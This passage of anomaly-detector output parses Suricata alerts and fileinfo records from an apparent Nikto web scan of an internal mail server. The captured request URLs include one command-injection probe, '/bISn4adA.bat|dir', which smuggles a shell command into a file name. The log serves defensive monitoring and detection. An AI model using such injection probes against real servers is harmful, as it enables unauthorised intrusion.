"/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46862,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46862, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":201554209196080,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 201554209196080, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.249681+0000\",\"flow_id\":201554209196080,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46862,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.251198 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46864 -> 192.168.10.154:80", "/parser/model/time": 1583349514.251198, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46864, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.251198 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46864 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.SMAIL893", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.251429+0000\",\"flow_id\":1038059219636916,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46864,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SMAIL893\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SMAIL893\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.251429, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1038059219636916,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46864,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SMAIL893\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SMAIL893\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46864,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SMAIL893\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SMAIL893\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.SMAIL893\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.SMAIL893\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.SMAIL893", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.SMAIL893", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46864,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46864, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1038059219636916,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1038059219636916, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.251429+0000\",\"flow_id\":1038059219636916,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46864,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SMAIL893\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SMAIL893\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.252850 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46866 -> 192.168.10.154:80", "/parser/model/time": 1583349514.25285, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46866, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.252850 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46866 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.cellsprint", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.252999+0000\",\"flow_id\":384781809015003,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46866,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cellsprint\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cellsprint\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.252999, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":384781809015003,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46866,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cellsprint\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cellsprint\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46866,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cellsprint\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cellsprint\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.cellsprint\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.cellsprint\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.cellsprint", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.cellsprint", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46866,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46866, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":384781809015003,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 384781809015003, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.252999+0000\",\"flow_id\":384781809015003,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46866,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cellsprint\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cellsprint\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.254583 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46868 -> 192.168.10.154:80", "/parser/model/time": 1583349514.254583, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46868, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.254583 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46868 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.bat|dir", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.254803+0000\",\"flow_id\":911490828394343,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46868,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bat|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bat|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.254803, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":911490828394343,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46868,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bat|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bat|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46868,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bat|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bat|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.bat|dir\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.bat|dir\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.bat|dir", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", 